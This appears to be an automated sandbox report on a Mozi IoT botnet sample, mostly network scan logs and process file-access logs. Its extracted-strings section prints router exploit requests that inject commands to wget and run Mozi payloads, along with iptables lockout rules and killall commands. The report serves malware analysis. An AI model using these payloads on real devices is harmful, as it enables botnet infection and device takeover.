Source: global traffic | TCP traffic: 192.168.2.20:47432 -> 98.165.182.239:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:47526 -> 55.39.75.135:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:54462 -> 27.51.109.17:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:40436 -> 35.162.94.106:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:54238 -> 140.140.91.170:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:34834 -> 25.158.113.102:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:34392 -> 6.106.120.182:81 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 106.127.147.213:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 176.92.243.205:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 34.128.35.111:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 193.107.186.95:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 115.120.194.236:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 20.118.133.18:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 149.239.53.87:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 156.220.244.53:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 208.111.56.155:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 57.252.155.151:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 152.239.97.46:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 152.221.34.124:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 119.64.213.236:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 92.124.231.59:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 146.6.49.32:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 73.212.135.84:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 114.5.151.204:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:52256 -> 43.42.84.127:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:45708 -> 77.173.227.171:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:43850 -> 61.143.240.243:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:36238 -> 101.33.206.177:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:50218 -> 63.168.39.202:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:38574 -> 7.252.25.102:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:47766 -> 165.183.156.14:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:44144 -> 99.222.192.3:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:52860 -> 97.72.143.47:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:54286 -> 142.89.68.59:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:40208 -> 83.101.228.252:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:50208 -> 189.28.141.200:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:46134 -> 137.41.148.60:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:32854 -> 38.79.244.233:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:34252 -> 83.191.87.167:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:55768 -> 174.204.143.88:81 |
Source: global traffic | TCP traffic: 192.168.2.20:50406 -> 55.112.46.169:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:41968 -> 174.242.148.233:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:33648 -> 182.32.81.51:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:39742 -> 214.19.91.180:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:41504 -> 28.8.96.182:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:48764 -> 211.150.15.80:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:50900 -> 67.222.221.70:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:60388 -> 186.4.165.144:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:60972 -> 63.80.240.64:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:44482 -> 20.119.144.2:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:36244 -> 71.204.5.240:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:45864 -> 53.165.88.238:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:44920 -> 99.127.24.157:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:53988 -> 211.121.75.90:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:52446 -> 106.219.59.104:81 |
Source: global traffic | TCP traffic: 192.168.2.20:52648 -> 184.241.148.254:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:39806 -> 92.242.40.195:81 |
Source: global traffic | TCP traffic: 192.168.2.20:49890 -> 155.6.95.108:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:33156 -> 124.236.254.90:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:40492 -> 141.206.254.140:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:36596 -> 52.240.164.145:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:49468 -> 187.78.60.235:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:40406 -> 29.179.230.224:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:38360 -> 193.228.21.18:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:43302 -> 193.170.193.163:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:33462 -> 198.192.88.15:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:41862 -> 46.2.142.178:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:59876 -> 211.157.99.239:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:47290 -> 120.5.123.53:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:60080 -> 92.116.223.234:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:56766 -> 202.114.86.56:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:44910 -> 149.240.175.109:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:41390 -> 138.192.249.226:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:39314 -> 81.68.199.130:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:57720 -> 137.139.2.130:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:36136 -> 139.199.14.195:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:50296 -> 95.157.19.163:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:53144 -> 70.67.151.179:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:41754 -> 200.28.173.176:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:37848 -> 120.93.77.91:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:55310 -> 53.12.77.94:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:36798 -> 176.248.47.153:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:33678 -> 130.119.213.235:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:44870 -> 113.11.182.35:81 |
Source: global traffic | TCP traffic: 192.168.2.20:56000 -> 2.138.198.216:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:47370 -> 3.86.100.243:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:53480 -> 217.142.133.66:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:34236 -> 140.231.98.112:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:50338 -> 215.249.79.198:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:34044 -> 63.182.159.18:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:56914 -> 83.8.62.47:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:55952 -> 191.248.194.68:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:59852 -> 26.39.204.248:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:50364 -> 132.182.225.98:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:34340 -> 61.137.14.142:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:49066 -> 181.203.100.36:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:55552 -> 106.14.60.18:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:33890 -> 162.136.172.41:81 |
Source: global traffic | TCP traffic: 192.168.2.20:54628 -> 41.155.207.183:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:34408 -> 99.148.201.126:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:54248 -> 190.192.94.182:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:52354 -> 92.141.22.32:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:36158 -> 43.93.231.189:81 |
Source: global traffic | TCP traffic: 192.168.2.20:53898 -> 21.188.95.234:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:37272 -> 85.195.54.139:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:54602 -> 21.127.188.168:81 |
Source: global traffic | TCP traffic: 192.168.2.20:60226 -> 133.215.160.216:81 |
Source: global traffic | TCP traffic: 192.168.2.20:47520 -> 165.101.122.42:81 |
Source: global traffic | TCP traffic: 192.168.2.20:46422 -> 198.125.156.213:81 |
Source: global traffic | TCP traffic: 192.168.2.20:57890 -> 116.155.23.65:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:46796 -> 24.54.15.164:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:43308 -> 2.158.179.66:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:58486 -> 74.194.107.251:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:45926 -> 94.230.220.30:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 119.209.23.112:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 102.176.178.224:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 199.69.235.21:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 158.92.202.121:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 122.243.254.61:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 144.63.116.58:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 108.192.176.65:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 108.153.206.152:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 103.232.41.84:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 87.76.34.106:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 44.46.34.202:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 98.200.244.150:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 8.133.238.164:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 13.197.37.37:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 119.18.92.1:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 75.1.214.251:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 212.239.243.44:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:56782 -> 136.44.214.227:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:40440 -> 123.30.132.60:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 180.87.46.7:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 194.76.167.240:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 19.163.225.60:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 41.66.166.102:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 57.39.61.233:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 181.44.194.250:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 65.219.26.223:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 108.207.211.243:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 223.255.156.91:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 188.89.65.27:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 47.246.174.228:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 104.54.87.43:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 107.145.6.139:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 212.50.67.118:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 68.103.55.168:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 124.207.8.18:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 198.184.153.233:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 100.209.152.180:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 121.220.162.59:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 107.33.123.182:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 170.146.44.71:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 139.210.220.124:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 184.234.20.63:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 45.223.99.28:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 154.86.108.206:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 20.202.173.70:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 217.188.58.175:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 61.46.241.38:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 153.116.132.166:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 104.222.148.240:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 217.221.166.38:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 70.6.244.64:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 19.18.50.247:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 75.137.161.83:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:57876 -> 71.40.128.63:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 36.6.47.186:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 5.71.245.186:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 209.37.10.223:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 147.148.65.25:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 194.207.70.113:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 182.24.155.194:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 70.135.20.121:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 91.180.230.147:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 202.221.1.28:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 96.50.197.214:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 42.56.59.180:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 203.213.20.163:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 91.244.32.53:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 186.81.247.159:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 119.202.144.95:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 119.173.29.245:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 9.172.43.63:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 8.208.36.68:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 180.52.239.233:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 203.70.165.212:2323 |
Source: Initial sample | Potential command found: POST /cdn-cgi/ |
Source: Initial sample | Potential command found: GET /c HTTP/1.0 |
Source: Initial sample | Potential command found: POST /cdn-cgi/ HTTP/1.1 |
Source: Initial sample | Potential command found: GET %s HTTP/1.1 |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP |
Source: Initial sample | Potential command found: rm /home/httpd/web_shell_cmd.gch |
Source: Initial sample | Potential command found: echo 3 > /usr/local/ct/ctadmincfg |
Source: Initial sample | Potential command found: mount -o remount,rw /overlay / |
Source: Initial sample | Potential command found: mv -f %s %s |
Source: Initial sample | Potential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT |
Source: Initial sample | Potential command found: GET /c |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT |
Source: Initial sample | Potential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT |
Source: Initial sample | Potential command found: killall -9 %s |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 22 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 23 -j DROP |
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP |
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP |
Source: Initial sample | Potential command found: killall -9 telnetd utelnetd scfgmgr |
Source: Initial sample | Potential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox |
Source: Initial sample | Potential command found: GET /Mozi.6 HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.7 HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.c HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.m HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.x HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.a HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.s HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.r HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.b HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.4 HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.k HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.l HTTP/1.0 |
Source: Initial sample | Potential command found: GET /Mozi.p HTTP/1.0 |
Source: Initial sample | Potential command found: GET /%s HTTP/1.1 |
Source: Initial sample | Potential command found: POST /%s HTTP/1.1 |
Source: Initial sample | Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1 |
Source: Initial sample | Potential command found: POST /picsdesc.xml HTTP/1.1 |
Source: Initial sample | Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
Source: Initial sample | Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 |
Source: Initial sample | Potential command found: POST /UD/act?1 HTTP/1.1 |
Source: Initial sample | Potential command found: POST /HNAP1/ HTTP/1.0 |
Source: Initial sample | Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0 |
Source: Initial sample | Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 |
Source: Initial sample | Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1 |
Source: Initial sample | Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m |
Source: Initial sample | Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/230/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/231/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/232/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/233/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/234/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3512/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/359/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/1452/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3632/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3518/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/10/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/1339/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/11/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/12/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/13/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/14/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/15/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/16/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/17/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/18/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/19/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/483/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3527/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3527/cmdline |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/1/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/2/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3525/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/1346/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3524/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3524/cmdline |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/4/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3523/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/5/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/7/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/8/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/9/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/20/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/21/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/22/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/23/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/24/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/25/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/28/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/29/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/1363/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3541/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3541/cmdline |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/1362/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/496/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/496/cmdline |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/30/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/31/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/31/cmdline |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/1119/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3790/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3791/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3310/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3431/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3431/cmdline |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3550/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/260/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/263/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/264/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/385/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/144/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/386/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/145/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/146/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3546/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3546/cmdline |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/147/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3303/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3545/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/148/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/149/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3543/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/822/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/822/cmdline |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3308/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3308/cmdline |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3429/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/3429/cmdline |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/47/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/48/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/48/cmdline |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/49/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/150/stat |
Source: /usr/bin/killall (PID: 4582) | File opened: /proc/271/stat |
